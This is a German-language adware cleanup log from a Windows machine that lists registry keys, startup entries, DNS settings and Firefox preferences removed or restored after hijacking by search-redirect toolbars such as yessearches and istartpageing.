[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11B16A3D-F03E-4565-A532-E66B219C9B03}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{11B16A3D-F03E-4565-A532-E66B219C9B03}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{11B16A3D-F03E-4565-A532-E66B219C9B03}
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}]
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\CLSID\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{F2DB3739-77FB-41EB-9ED3-ABF34DF2DBF7}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{296E49AA-76AE-4392-8145-A06733310DF1}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{7307C0C7-347E-48DD-BF91-F8E74D3FE764}
[!] Schlüssel Nicht Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[!] Schlüssel Nicht Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : HKCU\Software\BrowserAir
[-] Schlüssel Gelöscht : HKCU\Software\DAILYPCCLEAN
[-] Schlüssel Gelöscht : HKCU\Software\DownloadProtect
[-] Schlüssel Gelöscht : HKCU\Software\FFUPD
[-] Schlüssel Gelöscht : HKCU\Software\FunFeedr
[-] Schlüssel Gelöscht : HKCU\Software\ICSW1.17
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Tinstalls
[!] Schlüssel Nicht Gelöscht : HKCU\Software\Mozilla\Extends
[-] Schlüssel Gelöscht : HKCU\Software\Palikan
[-] Schlüssel Gelöscht : HKCU\Software\PRODUCTSETUP
[-] Schlüssel Gelöscht : HKCU\Software\Professional Cleaning Software
[-] Schlüssel Gelöscht : HKCU\Software\ProfessionalCleaningSoftwareLanguage
[-] Schlüssel Gelöscht : HKCU\Software\Reg\Clean
[-] Schlüssel Gelöscht : HKCU\Software\SpaceSoundPro
[-] Schlüssel Gelöscht : HKCU\Software\tstamptoken
[-] Schlüssel Gelöscht : HKCU\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[-] Schlüssel Gelöscht : HKCU\Software\AppDataLow\Sams.Browser
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Clara
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\FFPluginHp
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\istartpageingSoftware
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MPC
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Professional Cleaning Software
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\QuickSearch
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Reg\Clean
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\SpaceSondPro
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Tutorials
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\WdsManPro
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\yessearchesSoftware
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\yoursearchingSoftware
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowserAir
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Security utility
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPC
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Professional Cleaning Software
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\BrowserAir
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\BubbleSound
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\SearchModule
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\SOUNDPLUS
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\SpaceSoundPro
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Speedchecker Limited
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SOUNDPLUS
[-] Schlüssel Gelöscht : HKU\.DEFAULT\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[-] Schlüssel Gelöscht : HKU\S-1-5-19\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[-] Schlüssel Gelöscht : HKU\S-1-5-20\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\BrowserAir
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DAILYPCCLEAN
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DownloadProtect
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\FFUPD
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\FunFeedr
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\ICSW1.17
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Tinstalls
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Mozilla\Extends
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Palikan
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\PRODUCTSETUP
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Professional Cleaning Software
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\ProfessionalCleaningSoftwareLanguage
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Reg\Clean
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\SpaceSoundPro
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\tstamptoken
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\AppDataLow\Sams.Browser
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowserAir
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Uninstall\Security utility
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DownloadProtect
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\shopperz010220161759
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
[-] Daten Wiederhergestellt : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{31E15B1A-A8DD-4EE8-B691-0B5EF63443F3}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
[-] Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
[-] Daten Wiederhergestellt : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[!] Schlüssel Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{31E15B1A-A8DD-4EE8-B691-0B5EF63443F3}
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963} [NameServer]
[-] Daten Wiederhergestellt : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979} [NameServer]
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\terraclicks.com
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\tradeadexchange.com
[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www-searching.com
[-] Wert Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Security Utility]
[-] Wert Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [3D BubbleSound]
[-] Wert Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [Sound+]
[-] Wert Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [SpaceSoundPro]
[-] Wert Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [IDSCPRODUCT]
[!] Wert Nicht Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Run [Security Utility]
[-] Wert Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [SearchModule]
[-] Wert Gelöscht : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Security Utility]
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DPBHO.DownloadProtect
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\DPBHO.DownloadProtect.1

***** [ Internetbrowser ] *****

[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename", "yessearches");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename.US", "data:text/plain,browser.search.defaultenginename.US=yessearches");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.search.selectedEngine", "yoursearching");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("browser.startup.homepage", "search.mpc.am");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.mywebsearch.prevKwdEnabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.quick_start.enable_search1", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.BUTTON_STRUCTURE", "[{\"b\":224520315,\"c\":\"mindspark.magnify\",\"p\":\"L.0\"},{\"b\":224520316,\"c\":\"mindspark.entersearchterms\",\"p\":\"L.0.0[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.browser.version.last", "43.0");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.firstKnownVersion", "7.38.8.45986");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.homepage", "/index.jhtml?n=7829eb3a");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.hp.enabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.hp.guardType", "HPR");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.initialized", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.installation.installDate", "2016013114");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.installation.success", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lastActivePing", "1454247403235");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lastKnownVersion", "7.38.8.45986");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lssState", "{\"previousLocales\":[\"de\",\"en-US\",\"en\"],\"supportedLocales\":[\"de\",\"es\",\"pt\",\"ja\",\"en\"],\"defaultLocale\":\"en\",\"supp[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.defaultSearch", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.homePageEnabled", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.keywordEnabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.tabEnabled", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.language", "en");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.type", "Toolbar");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.successUrl", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.toolbarCollapsed", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.uninstallTasks", "{\"prefBranchesToDelete\":[\"extensions.toolbar.mindspark._brMembers_.\"],\"filesToDelete\":[\"C:\\\\Users\\\\Manz\\\\AppData\\\\R[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.hp.enabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.hp.enabled.guid", "yourGSearchfinder@GSearch.com");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.lastInstalled", "yourGSearchfinder@GSearch.com");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gelöscht : user_pref("keyword.URL", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gelöscht : user_pref("browser.newtab.url", "hxxp://www.istartpageing.com/newtab/?type=nt&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename", "istartpageing");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gelöscht : user_pref("browser.startup.homepage", "hxxp://www.istartpageing.com/?type=hp&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename", "istartpageing");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.search.defaultenginename.US", "data:text/plain,browser.search.defaultenginename.US=yessearches");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.search.selectedEngine", "istartpageing");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("browser.startup.homepage", "hxxp://www.yessearches.com/?ts=AHEpB38oBXYsBE..&v=20160121&uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&mode=ffseng");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.mywebsearch.prevKwdEnabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.quick_start.enable_search1", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.BUTTON_STRUCTURE", "[{\"b\":224520315,\"c\":\"mindspark.magnify\",\"p\":\"L.0\"},{\"b\":224520316,\"c\":\"mindspark.entersearchterms\",\"p\":\"L.0.0[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.browser.version.last", "43.0");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.firstKnownVersion", "7.38.8.45986");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.homepage", "/index.jhtml?n=7829eb40");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.hp.enabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.initialized", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.installation.installDate", "2016013120");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.installation.success", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lastActivePing", "1454267863579");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lastKnownVersion", "7.38.8.45986");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.lssState", "{\"previousLocales\":[\"de\",\"en-US\",\"en\"],\"supportedLocales\":[\"de\",\"es\",\"pt\",\"ja\",\"en\"],\"defaultLocale\":\"en\",\"supp[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.defaultSearch", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.homePageEnabled", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.keywordEnabled", true);
